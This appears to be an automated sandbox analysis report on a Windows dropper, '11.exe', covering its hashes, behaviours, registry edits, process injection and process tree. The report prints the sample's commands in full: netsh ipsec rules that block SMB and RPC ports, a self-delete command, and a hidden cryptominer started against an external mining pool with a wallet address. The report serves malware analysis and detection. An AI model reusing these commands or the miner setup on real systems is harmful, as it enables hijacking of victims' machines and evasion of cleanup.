Analysis
-
max time kernel
37s -
max time network
133s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
07-05-2021 13:05
Static task
static1
Behavioral task
behavioral1
Sample
11.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
11.exe
Resource
win10v20210410
General
-
Target
11.exe
-
Size
1.4MB
-
MD5
1fc1c860e86a8fbc2021d2567d62f703
-
SHA1
42ea2c9f4548614574dff36e019ae1cbc68b54e3
-
SHA256
76005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306
-
SHA512
fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
wudfhosts.exepid process 1992 wudfhosts.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule C:\Windows\Cursors\wudfhosts.exe upx C:\Windows\Cursors\WUDFhosts.exe upx \Windows\Cursors\WUDFhosts.exe upx -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 332 cmd.exe -
Loads dropped DLL 2 IoCs
Processes:
svchost.exesvchost.exepid process 1388 svchost.exe 396 svchost.exe -
Drops file in System32 directory 2 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Update[1].txt svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
svchost.exedescription pid process target process PID 1388 set thread context of 396 1388 svchost.exe svchost.exe -
Drops file in Windows directory 5 IoCs
Processes:
11.exesvchost.exedescription ioc process File created C:\Windows\Help\active_desktop_render.dll 11.exe File opened for modification C:\Windows\Cursors\WUDFhosts.exe 11.exe File created C:\Windows\Cursors\WUDFhosts.exe 11.exe File created C:\Windows\Help\active_desktop_render_New.dll svchost.exe File opened for modification C:\Windows\Help\active_desktop_render.dll svchost.exe -
Modifies data under HKEY_USERS 24 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a070023000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32} svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecision = "0" svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecisionReason = "1" svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecisionTime = 40916c2e4143d701 svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecision = "0" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadNetworkName = "Network" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionReason = "1" svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionTime = 40916c2e4143d701 svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\32-e2-17-db-d2-77 svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 svchost.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
svchost.exepid process 396 svchost.exe 396 svchost.exe 396 svchost.exe 396 svchost.exe 396 svchost.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
svchost.exewudfhosts.exedescription pid process Token: SeRestorePrivilege 396 svchost.exe Token: SeBackupPrivilege 396 svchost.exe Token: SeSecurityPrivilege 396 svchost.exe Token: SeTakeOwnershipPrivilege 396 svchost.exe Token: SeLockMemoryPrivilege 1992 wudfhosts.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
11.exesvchost.exesvchost.exepid process 1996 11.exe 1388 svchost.exe 396 svchost.exe 396 svchost.exe -
Suspicious use of WriteProcessMemory 63 IoCs
Processes:
11.exesvchost.exesvchost.exedescription pid process target process PID 1996 wrote to memory of 1472 1996 11.exe netsh.exe PID 1996 wrote to memory of 1472 1996 11.exe netsh.exe PID 1996 wrote to memory of 1472 1996 11.exe netsh.exe PID 1996 wrote to memory of 1472 1996 11.exe netsh.exe PID 1996 wrote to memory of 1968 1996 11.exe netsh.exe PID 1996 wrote to memory of 1968 1996 11.exe netsh.exe PID 1996 wrote to memory of 1968 1996 11.exe netsh.exe PID 1996 wrote to memory of 1968 1996 11.exe netsh.exe PID 1996 wrote to memory of 1748 1996 11.exe netsh.exe PID 1996 wrote to memory of 1748 1996 11.exe netsh.exe PID 1996 wrote to memory of 1748 1996 11.exe netsh.exe PID 1996 wrote to memory of 1748 1996 11.exe netsh.exe PID 1996 wrote to memory of 484 1996 11.exe netsh.exe PID 1996 wrote to memory of 484 1996 11.exe netsh.exe PID 1996 wrote to memory of 484 1996 11.exe netsh.exe PID 1996 wrote to memory of 484 1996 11.exe netsh.exe PID 1996 wrote to memory of 1904 1996 11.exe netsh.exe PID 1996 wrote to memory of 1904 1996 11.exe netsh.exe PID 1996 wrote to memory of 1904 1996 11.exe netsh.exe PID 1996 wrote to memory of 1904 1996 11.exe netsh.exe PID 1996 wrote to memory of 1628 1996 11.exe netsh.exe PID 1996 wrote to memory of 1628 1996 11.exe netsh.exe PID 1996 wrote to memory of 1628 1996 11.exe netsh.exe PID 1996 wrote to memory of 1628 1996 11.exe netsh.exe PID 1996 wrote to memory of 284 1996 11.exe netsh.exe PID 1996 wrote to memory of 284 1996 11.exe netsh.exe PID 1996 wrote to memory of 284 1996 11.exe netsh.exe PID 1996 wrote to memory of 284 1996 11.exe netsh.exe PID 1996 wrote to memory of 1156 1996 11.exe netsh.exe PID 1996 wrote to memory of 1156 1996 11.exe netsh.exe PID 1996 wrote to memory of 1156 1996 11.exe netsh.exe PID 1996 wrote to memory of 1156 1996 11.exe netsh.exe PID 1996 wrote to memory of 1984 1996 11.exe netsh.exe PID 1996 wrote to memory of 1984 1996 11.exe netsh.exe PID 1996 wrote to memory of 1984 1996 11.exe netsh.exe PID 1996 wrote to memory of 1984 1996 11.exe netsh.exe PID 1996 wrote to memory of 1800 1996 11.exe netsh.exe PID 1996 wrote to memory of 1800 1996 11.exe netsh.exe PID 1996 wrote to memory of 1800 1996 11.exe netsh.exe PID 1996 wrote to memory of 1800 1996 11.exe netsh.exe PID 1996 wrote to memory of 340 1996 11.exe netsh.exe PID 1996 wrote to memory of 340 1996 11.exe netsh.exe PID 1996 wrote to memory of 340 1996 11.exe netsh.exe PID 1996 wrote to memory of 340 1996 11.exe netsh.exe PID 1996 wrote to memory of 332 1996 11.exe cmd.exe PID 1996 wrote to memory of 332 1996 11.exe cmd.exe PID 1996 wrote to memory of 332 1996 11.exe cmd.exe PID 1996 wrote to memory of 332 1996 11.exe cmd.exe PID 1388 wrote to memory of 396 1388 svchost.exe svchost.exe PID 1388 wrote to memory of 396 1388 svchost.exe svchost.exe PID 1388 wrote to memory of 396 1388 svchost.exe svchost.exe PID 1388 wrote to memory of 396 1388 svchost.exe svchost.exe PID 1388 wrote to memory of 396 1388 svchost.exe svchost.exe PID 1388 wrote to memory of 396 1388 svchost.exe svchost.exe PID 1388 wrote to memory of 396 1388 svchost.exe svchost.exe PID 1388 wrote to memory of 396 1388 svchost.exe svchost.exe PID 1388 wrote to memory of 396 1388 svchost.exe svchost.exe PID 1388 wrote to memory of 396 1388 svchost.exe svchost.exe PID 1388 wrote to memory of 396 1388 svchost.exe svchost.exe PID 396 wrote to memory of 1992 396 svchost.exe wudfhosts.exe PID 396 wrote to memory of 1992 396 svchost.exe wudfhosts.exe PID 396 wrote to memory of 1992 396 svchost.exe wudfhosts.exe PID 396 wrote to memory of 1992 396 svchost.exe wudfhosts.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe"1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Block2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=Filter12⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=FilteraAtion1 action=block2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion12⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Block assign=y2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\11.exe"2⤵
- Deletes itself
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\SysWOW64\svchost.exe -k GraphicsPerf_SvcsGroup1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\system32\svchost.exe2⤵
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\Cursors\wudfhosts.exeC:\Windows\Cursors\wudfhosts.exe -o xmr.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Windows\Cursors\WUDFhosts.exeMD5
4a72e30c0a582b082030adfd8345014f
SHA12f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353
SHA256e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976
SHA5128a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798
-
C:\Windows\Cursors\wudfhosts.exeMD5
4a72e30c0a582b082030adfd8345014f
SHA12f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353
SHA256e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976
SHA5128a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798
-
\??\c:\windows\help\active_desktop_render.dllMD5
14e2b194b652d4fd912404775a6ae898
SHA1e93f529bb61e12c41426cb2b86176bf0af387c09
SHA25624ca5f0220c6bbcb081de1cd4e4115bb026cd45dbe34fc462a40b241b026d66c
SHA512b2ee0b06da1a42c04ef54e36f4a66720698e1c2d58545854d0989ae805d00e760b8bc8815ab00dd8be208f7816ed4249855c9fa506427c1f89a3dfb309c734d6
-
\Windows\Cursors\WUDFhosts.exeMD5
4a72e30c0a582b082030adfd8345014f
SHA12f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353
SHA256e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976
SHA5128a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798
-
\Windows\Help\active_desktop_render.dllMD5
14e2b194b652d4fd912404775a6ae898
SHA1e93f529bb61e12c41426cb2b86176bf0af387c09
SHA25624ca5f0220c6bbcb081de1cd4e4115bb026cd45dbe34fc462a40b241b026d66c
SHA512b2ee0b06da1a42c04ef54e36f4a66720698e1c2d58545854d0989ae805d00e760b8bc8815ab00dd8be208f7816ed4249855c9fa506427c1f89a3dfb309c734d6
-
memory/284-72-0x0000000000000000-mapping.dmp
-
memory/332-84-0x0000000000000000-mapping.dmp
-
memory/340-80-0x0000000000000000-mapping.dmp
-
memory/396-87-0x0000000010000000-0x000000001010C000-memory.dmpFilesize
1.0MB
-
memory/396-89-0x0000000010000000-0x000000001010C000-memory.dmpFilesize
1.0MB
-
memory/396-93-0x0000000010000000-0x000000001010C000-memory.dmpFilesize
1.0MB
-
memory/396-91-0x0000000010072B6D-mapping.dmp
-
memory/396-88-0x0000000010000000-0x000000001010C000-memory.dmpFilesize
1.0MB
-
memory/396-86-0x0000000010000000-0x000000001010C000-memory.dmpFilesize
1.0MB
-
memory/484-66-0x0000000000000000-mapping.dmp
-
memory/1156-74-0x0000000000000000-mapping.dmp
-
memory/1472-60-0x0000000000000000-mapping.dmp
-
memory/1628-70-0x0000000000000000-mapping.dmp
-
memory/1748-64-0x0000000000000000-mapping.dmp
-
memory/1800-78-0x0000000000000000-mapping.dmp
-
memory/1904-68-0x0000000000000000-mapping.dmp
-
memory/1968-62-0x0000000000000000-mapping.dmp
-
memory/1984-76-0x0000000000000000-mapping.dmp
-
memory/1992-96-0x0000000000000000-mapping.dmp
-
memory/1992-98-0x00000000000F0000-0x0000000000100000-memory.dmpFilesize
64KB
-
memory/1992-99-0x0000000000220000-0x0000000000230000-memory.dmpFilesize
64KB
-
memory/1992-100-0x0000000000230000-0x0000000000240000-memory.dmpFilesize
64KB
-
memory/1992-101-0x0000000000240000-0x0000000000250000-memory.dmpFilesize
64KB
-
memory/1996-59-0x00000000765F1000-0x00000000765F3000-memory.dmpFilesize
8KB